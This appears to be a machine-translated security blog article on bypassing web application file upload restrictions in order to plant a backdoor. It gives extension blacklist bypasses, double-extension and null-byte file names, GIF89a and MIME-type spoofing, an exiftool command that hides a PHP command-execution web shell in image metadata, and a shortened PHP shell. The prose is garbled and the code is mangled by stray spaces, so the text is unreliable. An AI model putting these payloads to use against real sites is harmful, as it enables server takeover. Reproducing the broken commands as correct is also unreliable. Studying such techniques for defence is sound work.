How to Bypass file upload restrictions in web applications to install a backdoor

Uploading files is very common on a good percentage of websites around the world. Platforms like LinkedIn or Facebook allow users to upload images, MP3, MP4, PDF files and many other formats. However, cybersecurity specialists point out that file charge also poses severe security risks that must be addressed before hackers abuse them.

This time, specialists at the International Institute of Cyber Security (IICS) will show ways threat actors can abuse the file upload feature to compromise websites and even servers.

It is important to know the basics about web shells and file upload vulnerabilities. Attackers use web shells for various operations, such as executing shell commands, deleting files, creating files, uploading files, and so on. It is often possible to load a reverse shell without overlooking filters and constraints.

Bypass blacklists

For cybersecurity reasons, certain types of extensions are explicitly prohibited from being blacklisted on the server. This may seem like the best solution to keep websites and servers free of hacking, although there are certain conditions that can be bypassed.

File extensions

Developers blacklist certain file extensions and prevent users from uploading files that are considered dangerous to the server. However, threat actors can fix this condition by changing some lines in extensions to load and run a payload or web shell.

Below is a list of various programming languages with the corresponding extension names:

  • PHP: .pht, phtml, .php, .php3, .php4, .php5, .php6, .inc
  • JSP: .jsp, .jspx, .jsw, .jsv, and .jspf
  • Perl: .pl, .pm, .cgi, .lib
  • Asp: asp, .aspx
  • Coldfusion: .cfm, cfml, .cfc, .dbm

In some cases, changing extensions may not help; instead, you should do the following:

.pHp, .Php, .phP

Whitelist omission

The whitelist only lists certain extensions that the server accepts as downloads. For example, a website that allows uploading a profile picture can support JPG, JPEG or PNG formats, cybersecurity experts mentioned.

On the other hand, Apache allows you to upload files with double extensions. This means that threat actors could trick the server into accepting a shell that also has a PNG extension at the end.

shell.php.png
shell.php%00.png
shell.php\x00.jpg

Another way to avoid whitelisting is to manipulate file type headers. According to cybersecurity specialists, if a particular website accepts images, it also accepts GIF images. Hackers can add GIF89a to trick the server into loading the shell.

EXIF data

This method allows you to avoid file upload restrictions by using EXIF data in the image. The server will add a comment that contains PHP code when processing the image.

This attack is very easy to complete using gimp or ExifTool, mentioned by cybersecurity experts.

exiftool -Comment = '<? php echo "<pre>"; system ($ _ GET [' cmd ']); ?> ' file.png
mv image. jpg image. php .png

MYME types

MIME Types (Multipurpose Internet Mail Extensions) are the standard way to send content over the network. MIME types specify data types, such as text, image, audio, and so on that files contain.

Blacklisting MIME types is also a method for verifying file upload. Hackers can intercept POST requests on the server path and change the respective MIME types. The usual PHP MIME type is:

Content-type: application / x-php

Hackers can replace this value with:

Content-type: image / jpeg

Other alternative methods

In some situations, the length of the content can also cause problems when validating the uploaded files, cybersecurity experts point out. To do this, the PHP shell command can be abbreviated as follows:

< ? = '$ _GET [x]' ? > < Br >

Please note that this article was prepared for informational purposes only, so IICS is not responsible for any misuse of the information contained herein. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.